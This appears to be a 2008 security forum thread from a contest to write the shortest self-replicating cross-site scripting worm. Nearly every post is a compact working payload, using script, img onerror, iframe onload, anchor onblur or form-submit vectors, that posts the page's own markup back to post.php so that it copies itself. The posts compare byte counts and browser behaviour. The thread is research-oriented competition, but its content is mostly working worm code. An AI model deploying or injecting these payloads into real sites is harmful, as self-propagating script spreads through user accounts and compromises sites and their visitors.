Diminutive XSS Worm Replication Contest

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 12:24PM

<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Matt Presson

Date: January 07, 2008 12:27PM

Ok Ronald, I can get you by two more (don't need the parens on the ending bold function). Works in FF2 and IE7.

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 12:33PM

@Matt

aha, does not work the above, it send the bold function instead of the payload if you leave out the ()

payload becomes:

function bold() {

    [native code]

}

Edited 3 time(s). Last edit at 01/07/2008 12:36PM by Ronald.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 07, 2008 12:34PM

@Ronald

Yeah really cool :D

Does innerHTML not add the closing iframe tag though?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 12:37PM

nope

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: bwb labs

Date: January 07, 2008 12:47PM

I see all kind of statements of 'works on FF/IE', but I think you didn't test it on The unofficial judge... If you actually try to get it work, there are all kinds of problems that need to be solved that are interesting, they involve lots of hacks etc.

Anyway, some wide used optimization I was missing: with(){..;..} -> with()..,.. saving 2 bytes of both vectors, and they work and are tested on FF2/IE7/Opera9.5/Safari3.04:

<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>

254 bytes - XMLHttpRequest, image

<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

251 bytes - XMLHttpRequest, script

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 12:58PM

Just to be sure Gareth I close the iframe, this functions on Firebug like a charm and doesn't grow for sure:


<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>

So it becomes: 138Bytes

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 01:03PM

<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

can also be a winner!

Edited 2 time(s). Last edit at 01/07/2008 02:04PM by Ronald.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Matt Presson

Date: January 07, 2008 01:05PM

Ok looked at this one through WebScarab on the unofficial (177 bytes). Though does present doctype issues with ie7.

<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),send('content='+encodeURI('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 01:09PM

=.

becomes: '.' in firefox.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Spyware

Date: January 07, 2008 01:22PM

Dunno what firefox you are using but here it just stays =. If it DOES change, try =/

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 01:29PM

Internally it changes it to ".", which also can be seen with firebug since it's invalid markup, so I guess it doesn't count because ultimately it grows in strict theory?

=/ doesn't work here.

I'd be happy to adjust my vector with it, it saves a byte but I dunno... I guess there is something to say for valid markup as well.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 01:36PM

But then again the first of this series:

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

which is a 130 bytes, does pass the judges without growing. Still, I'm not sure about the Iframe closing tag, so I posted a second. But, Firefox internally closes the markup but doesn't output it...

so are there votes for valid markup as well? sounds plausible if so.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Spyware

Date: January 07, 2008 01:47PM

Live HTTP Headers give me this Ronald:

(post)content=<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b></iframe></b>

Content-Length: 157

I guess we should start checking the actual content-length size instead of our output size. (Well, I was checking the output length anyway, not the content-length size).

I bet RSnake uses the content-length also.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 01:53PM

Hence, the question. Firebug gave the same, but still it doesn't output it in the page that follows. With a closing tag it's still 138, and suits fine for me. But I bet on the 135 byte img tag instead, sounds more safe :)

I have to work, have fun guys!

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 02:21PM

I don't wanna be ants in the picnic but on a Apache1.3.x/2.2.x with default settings the POST array is simply empty. Again the content-type issue...

Anyway - most of the examples can still be shortened by one byte:

<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>

134

<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

129

Greetings,
.mario

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: beNi

Date: January 07, 2008 03:22PM

so now people are using my <b></b> .bold() solution. thx :)

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 03:28PM

Not exactly but I am glad you are happy.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: ma1

Date: January 07, 2008 03:33PM

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">

155

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 03:44PM

I should be ashamed.. I should be ashamed... I should be ashamed...

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

154

:)

Edited 1 time(s). Last edit at 01/07/2008 03:44PM by .mario.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: sirdarckcat

Date: January 07, 2008 03:45PM

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

154
thnks ma1!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: sirdarckcat

Date: January 07, 2008 03:45PM

ahhhh 1 minute late!!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 03:46PM

Hehe how cool - like sniping on eBay ;)

Edited 1 time(s). Last edit at 01/07/2008 03:46PM by .mario.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: backStorm

Date: January 07, 2008 03:46PM

hi,

this is actually a conclusion of solutions around here but it is shorter and hopefully working. (tested only in firefox)

<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>

Length: 125

-backStorm

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 03:51PM

@backStorm: Onload for an <I> tag probably won't work. Check here for tag/event infos.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Matt Presson

Date: January 07, 2008 04:04PM

@backStorm - you could do it like this, although there is an element of user interaction required. Also, you do not need to close the a tag so it saves you a byte to get 124 bytes.

<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

@.mario - You are correct that his does not work in Firefox on either of the (unofficial) judge pages.

Edited 2 time(s). Last edit at 01/07/2008 04:11PM by Matt Presson.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:12PM

@mario: the iframe doesn't count since it grows.
(though it's still a debate)

131 then!

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>

don't ask WHY but it seems to work.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 07, 2008 04:18PM

@Ronald: ~~Plain wow - it even works on IE7!~~

I just saw in FF2 the request is made but not wrapped in the element 'content' - Firebug shows the request as such:

<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold
(alert('XSS')))" src=""></b>

should be:

content=<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML
.bold(alert('XSS')))" src=""></b>

Edited 1 time(s). Last edit at 01/07/2008 04:25PM by .mario.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Matt Presson

Date: January 07, 2008 04:19PM

Same premise as Ronald's, but revised with backStorm's.

125 Bytes

<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>

Edited 3 time(s). Last edit at 01/07/2008 04:32PM by Matt Presson.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: sirdarckcat

Date: January 07, 2008 04:25PM

ronald:
it doesnt grow, it has a slice :D

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: Reply•Quote